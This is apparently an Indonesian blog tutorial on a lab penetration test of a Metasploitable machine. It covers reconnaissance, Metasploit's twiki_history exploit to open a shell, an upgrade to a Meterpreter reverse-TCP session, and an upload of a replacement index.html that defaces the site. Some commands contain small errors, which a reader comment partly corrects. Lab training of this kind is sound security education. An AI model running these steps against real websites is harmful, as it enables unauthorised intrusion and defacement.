(Pentest) Deface Web Melalui Twiki Vulnerability Menggunakan Exploit Twiki History



Pada artkel kali ini kita mencoba simulasi jaringan penetration test terhadap suatu web yang menggunakan twiki pada web nya.

Untuk simulasi ini, saya telah menginstall OS Linux Metasploitable (sebagai target), yang memang diciptakan sebagai bahan percobaan penetration. dan file "index.html" yang akan dijadikan tampilan (deface) pada halaman utama web.

Sebelumnya IP korban ini diketahui sebagai 192.167.137.100, untuk mengetahui informasi lainnya (informasi gathering) tentang target ini, ketikkan pada consol / terminal:

whatweb 192.168.137.100

pada tampilan webnya, target ini diketahui menggunakan twiki.
Twiki adalah manipulasi basis data terstruktur yang digunakan sebagai kontrol pada suatu web.
(informasi lanjut tentang twiki, wikipedia)

Sama halnya dengan sistem-sistem lainnya, twiki juga memiliki vulnerable terhadap kemanannya, sehingga banyak para administrator jaringan yang mengetahui celah keamanan pada webnya memperbaiki celah ini.

berikut ini yang akan disimulasikan adalah target yang belum diperbaiki celah ini (twiki). bagaimana cara masuk kedalam sistem tersebut, dan defacing terhadap file index nya.

Disini kita akan menggunakan exploit twiki_history, yang ada pada tools metasploit. Untuk OS Kali Linux dan OS offensive security lainnya, metasploit telah include di dalam packet instalasinya. sehingga kita tidak perlu lagi menginstallnya.

Pada console / terminal , ketikkan:
msfconsole

 tunggu beberapa saat, dan metasploit siap dijalankan.

pada console "msf5 >" ketikkan nama exploit yang akan digunakan:
use exploit/unit/webapp/twiki_history

setelah exploit tersebut dipilih, untuk mengetahui module dari exploit ini. ketikkan:
show options



untuk set RHOSTS input IP target:
set RHOSTS 192.168.137.100

untuk set URI input "/twiki/bin":
set URI /twiki/bin

untuk menjalankan exploitnya, cukup ketikkan:
exploit -j



Jika twiki pada target tersebut vulnerable terhadap exploit ini, maka shell akan terhubung ke sistem target, ditandai dengan adanya pemberitahuan "command shell opened" kurang lebih seperti berikut:
Command shell session 1 opened (ip kita:port) -> (ip target:port) at tahun-bulan-tanggal jam

jika shell sudah terhubung, cek session yang aktif, command:
session -l 

akan terdapat daftar shell yang terhubung ke target.

selanjutnya adalah kita akan meningkatkan shell tersebut menjadi meterpreter, agar lebih leluasa bergerak pada sistem target tersebut. Menggunakan "shell_to_meterpreter". command:
use post/multi/manage/shell_to_meterpreter

dilanjutkan dengan menampilkan module:
show options

set SESSION isi dengan nomor shell yang terhubung ke target:
set SESSION 1

dan untuk menjalankannya, command:
exploit



Dan jika shell berhasil ditingkatkan menjadi meterpreter, akan ditampilkan notifikasi:
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on (ip kita:port)
[*] Sending stage (985320 bytes) to (ip target)
[*] Meterpreter session 3 opened (ip kita:port -> (ip target:port) at tanggal jam
[*] Comand stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed

Kemudian tampilkan session dalam daftar:
session -v

Pilih session yang bertype "meterpreter linux"


ID session yang ada dalam gambar ini, yang memiliki type "meterpreter linux" ada pada ID nomor 3. untuk itu pilih session nya dengan ID 3:
session -i 3

 Jika telah terhubung, akan ditandai dengan starting commandnya (baris perintah) nya dengan:
meterpreter >

coba ketikkan help, terdapat beberapa command yang bisa digunakan.

sesua dengan judul artikel diatas, kita hanya melakukan defacing pada web ini. untuk itu, kita langsung masuk saja ke directory halaman utamanya, yaitu pada "/var/www/".

URI path yang kita set sebelumnya adalah "/twiki/bin/", umumnya directory ini berada pada "/var/www/twiki/bin" untuk itu ketikkan command "cd .." untuk mundur ke directory sebelumnya, dan lakukan satu kali lagi "cd .." sampai dengan directory "/var/www/"

untuk memastikannya, command "ls" untuk memeriksa isi directory dari "/var/www" tersebut. Jika ditemukan file index.* (html, php, dsb) kita sudah berada pada directory utama.

upload file "index.html" yang sebelumnya sudah disiapkan untuk mengganti halaman utama target:
upload index.html


cek untuk memastikan:
ls



buka browser, dan pada address bar nya ketikkan nama/ip target. Seharusnya halaman utama pada target telah di deface.



Untuk lebih jelasnya, silahkan simak video nya pada channel blog ini di youtube:



Jika kalian suka, silahkan like dan subscribe channel tersebut.

Semoga bermanfaat.


1 comment:

  1. Thanks for the article. This was the only one I was able to find that showed how to do this. One correction, it says "session" in two places, and it is supposed to say "sessions".

    Terima kasih atas artikelnya. Ini adalah satu-satunya yang dapat saya temukan yang menunjukkan bagaimana melakukan ini. Satu koreksi, dikatakan "session" di dua tempat, dan seharusnya mengatakan "sessions".

    ReplyDelete